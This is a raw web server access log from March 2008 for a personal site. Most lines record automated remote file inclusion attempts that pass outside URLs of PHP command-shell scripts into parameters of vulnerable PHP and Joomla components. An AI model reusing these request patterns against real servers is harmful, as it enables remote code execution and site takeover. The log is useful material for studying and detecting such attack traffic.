75.126.130.198 - - [04/Mar/2008:04:00:09 -0800] "GET //class/class.admin_menu.php?where_framework=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:04:00:09 -0800] "GET /logs//class/class.admin_menu.php?where_framework=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:04:00:17 -0800] "GET /modules/feedback/block.feedback.php?where_cms=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:04:00:17 -0800] "GET /logs/modules/feedback/block.feedback.php?where_cms=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:04:01:09 -0800] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:04:01:10 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:04:01:10 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.155.165.40 - - [04/Mar/2008:04:01:18 -0800] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [04/Mar/2008:04:01:33 -0800] "GET //inc/download_center_lite.inc.php?script_root=http://arche-feldkirchen.de//mambots/system/systems.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
85.214.95.209 - - [04/Mar/2008:04:01:33 -0800] "GET /logs//inc/download_center_lite.inc.php?script_root=http://arche-feldkirchen.de//mambots/system/systems.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
85.214.95.209 - - [04/Mar/2008:04:01:36 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://arche-feldkirchen.de//mambots/system/systems.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
85.214.95.209 - - [04/Mar/2008:04:01:36 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://arche-feldkirchen.de//mambots/system/systems.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
77.221.130.3 - - [04/Mar/2008:04:01:54 -0800] "GET /logs/access_080122.log//?pag=http://geocities.com/kawats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [04/Mar/2008:04:01:55 -0800] "GET //?pag=http://geocities.com/kawats/id.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [04/Mar/2008:04:01:55 -0800] "GET /logs//?pag=http://geocities.com/kawats/id.txt? HTTP/1.1" 200 37265 "-" "libwww-perl/5.803" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:04:04:10 -0800] "GET /lib/lib.php?where_cms=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:04:04:13 -0800] "GET /logs/lib/lib.php?where_cms=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:04:04:25 -0800] "GET /logs/access_080215.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:04:04:25 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:04:04:26 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.166.170.10 - - [04/Mar/2008:04:05:01 -0800] "GET /logs/!scanhttp://globalenvoy.com//12all/admin/images/admin/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
83.166.170.10 - - [04/Mar/2008:04:05:03 -0800] "GET /!scanhttp://globalenvoy.com//12all/admin/images/admin/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
64.34.173.70 - - [04/Mar/2008:04:05:05 -0800] "GET /logs/access_080216.log//oneadmin/photogallery/include.php?path[docroot]=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.173.70 - - [04/Mar/2008:04:05:05 -0800] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:04:05:21 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:04:05:21 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:04:05:21 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:04:05:21 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:04:07:33 -0800] "GET /logs/access_080207.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.234.116.170 - - [04/Mar/2008:04:09:28 -0800] "GET /logs/access_080211.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://geocities.com/tomohonhack1/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.116.170 - - [04/Mar/2008:04:09:28 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://geocities.com/tomohonhack1/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:09:41 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.214.234 - - [04/Mar/2008:04:09:43 -0800] "GET /logs/access_080122.log HTTP/1.0" 200 590794 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:09:50 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.38.15.70 - - [04/Mar/2008:04:09:50 -0800] "GET //admin/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
61.38.15.70 - - [04/Mar/2008:04:09:52 -0800] "GET /logs//admin/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:04:09:55 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.angelfire.com/linux/ryu1/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:04:09:55 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.angelfire.com/linux/ryu1/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:04:09:56 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.angelfire.com/linux/ryu1/b?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
211.234.116.170 - - [04/Mar/2008:04:10:00 -0800] "GET /logs/access_080108.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://geocities.com/tomohonhack1/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:04:10:01 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.angelfire.com/linux/ryu1/b?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:04:10:02 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.angelfire.com/linux/ryu1/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:10:33 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.17.26.135 - - [04/Mar/2008:04:10:36 -0800] "GET //?pag=http://biglion.altervista.org/id.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.803" "www.dmulk.com"
64.21.165.64 - - [04/Mar/2008:04:10:56 -0800] "GET /logs/access_080118.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.165.64 - - [04/Mar/2008:04:10:56 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.165.64 - - [04/Mar/2008:04:10:56 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:04:11:15 -0800] "GET /logs/access_080216.log/admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:04:11:15 -0800] "GET /admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:04:11:15 -0800] "GET /logs/admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:04:11:18 -0800] "GET /logs/access_080106.log/admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.147.163.85 - - [04/Mar/2008:04:11:56 -0800] "GET /logs/access_080207.log/newspublish/samplenewspublish.php?path[docroot]=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.69.144.194 - - [04/Mar/2008:04:13:03 -0800] "GET /logs/access_080121.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.69.144.194 - - [04/Mar/2008:04:13:03 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.69.144.194 - - [04/Mar/2008:04:13:04 -0800] "GET /logs/payment/secpay/config.inc.php?config%5broot_dir%5d=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.234.116.170 - - [04/Mar/2008:04:13:08 -0800] "GET /logs/access_080117.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://geocities.com/tomohonhack1/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.116.170 - - [04/Mar/2008:04:13:09 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://geocities.com/tomohonhack1/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.116.170 - - [04/Mar/2008:04:15:10 -0800] "GET /logs/access_080215.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://geocities.com/tomohonhack1/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:04:16:08 -0800] "GET /logs/access_080106.log/admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:04:16:08 -0800] "GET /admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:04:16:08 -0800] "GET /logs/admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:04:16:12 -0800] "GET /logs/access_080216.log/admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.36.74.135 - - [04/Mar/2008:04:19:14 -0800] "GET /scanhttp://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
212.36.74.135 - - [04/Mar/2008:04:19:14 -0800] "GET /logs/scanhttp://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
212.36.74.135 - - [04/Mar/2008:04:19:14 -0800] "GET /scanhttp://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
212.36.74.135 - - [04/Mar/2008:04:19:14 -0800] "GET /logs/scanhttp://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
212.36.74.135 - - [04/Mar/2008:04:19:15 -0800] "GET /scanhttp://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
212.36.74.135 - - [04/Mar/2008:04:19:15 -0800] "GET /logs/scanhttp://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.30.216.99 - - [04/Mar/2008:04:19:39 -0800] "GET /logs/access_080119.log HTTP/1.0" 200 618239 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.30.169.80 - - [04/Mar/2008:04:20:14 -0800] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.137.31.4 - - [04/Mar/2008:04:21:58 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
89.137.31.4 - - [04/Mar/2008:04:21:58 -0800] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
208.53.147.60 - - [04/Mar/2008:04:22:01 -0800] "GET /scanhttp://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
208.53.147.60 - - [04/Mar/2008:04:22:01 -0800] "GET /logs/scanhttp://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
208.53.147.60 - - [04/Mar/2008:04:22:01 -0800] "GET /scanhttp://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
208.53.147.60 - - [04/Mar/2008:04:22:01 -0800] "GET /scanhttp://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
208.53.147.60 - - [04/Mar/2008:04:22:01 -0800] "GET /logs/scanhttp://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
208.53.147.60 - - [04/Mar/2008:04:22:01 -0800] "GET /logs/scanhttp://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:04:22:40 -0800] "GET /index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.97.181.220 - - [04/Mar/2008:04:23:31 -0800] "GET /scanhttp://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
208.97.181.220 - - [04/Mar/2008:04:23:31 -0800] "GET /logs/scanhttp://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
208.97.181.220 - - [04/Mar/2008:04:23:31 -0800] "GET /scanhttp://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
208.97.181.220 - - [04/Mar/2008:04:23:31 -0800] "GET /logs/scanhttp://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
208.97.181.220 - - [04/Mar/2008:04:23:32 -0800] "GET /scanhttp://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
208.97.181.220 - - [04/Mar/2008:04:23:33 -0800] "GET /logs/scanhttp://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:04:23:45 -0800] "GET /logs/errors.php?error=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:04:23:45 -0800] "GET /errors.php?error=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
77.221.130.3 - - [04/Mar/2008:04:24:03 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://geocities.com/kawats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [04/Mar/2008:04:24:03 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://geocities.com/kawats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [04/Mar/2008:04:24:04 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://geocities.com/kawats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.218 - - [04/Mar/2008:04:24:25 -0800] "GET /bikes/GPS/WeSTOC2006/?S=A HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.153 - - [04/Mar/2008:04:25:20 -0800] "GET /mobileoffice/?D=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.241.213.119 - - [04/Mar/2008:04:27:08 -0800] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.119 - - [04/Mar/2008:04:27:09 -0800] "GET //init_basic.php?GALLERY_BASEDIR=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.119 - - [04/Mar/2008:04:27:09 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.69.144.194 - - [04/Mar/2008:04:27:51 -0800] "GET /logs/access_080123.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.68.146 - - [04/Mar/2008:04:28:15 -0800] "GET //include/write.php?dir=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
81.25.68.146 - - [04/Mar/2008:04:28:15 -0800] "GET /logs//include/write.php?dir=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.162.134.138 - - [04/Mar/2008:04:29:24 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.138 - - [04/Mar/2008:04:29:24 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.138 - - [04/Mar/2008:04:29:24 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
146.164.250.58 - - [04/Mar/2008:04:30:20 -0800] "GET /logs/gitu..http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
146.164.250.58 - - [04/Mar/2008:04:30:20 -0800] "GET /gitu..http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
67.212.164.48 - - [04/Mar/2008:04:31:01 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.48 - - [04/Mar/2008:04:31:01 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.48 - - [04/Mar/2008:04:31:01 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:04:31:08 -0800] "GET //admin.php?include_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:04:31:08 -0800] "GET /logs//admin.php?include_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
67.212.164.48 - - [04/Mar/2008:04:31:23 -0800] "GET /logs/access_080216.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:31:43 -0800] "GET /logs/access_080215.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:31:44 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
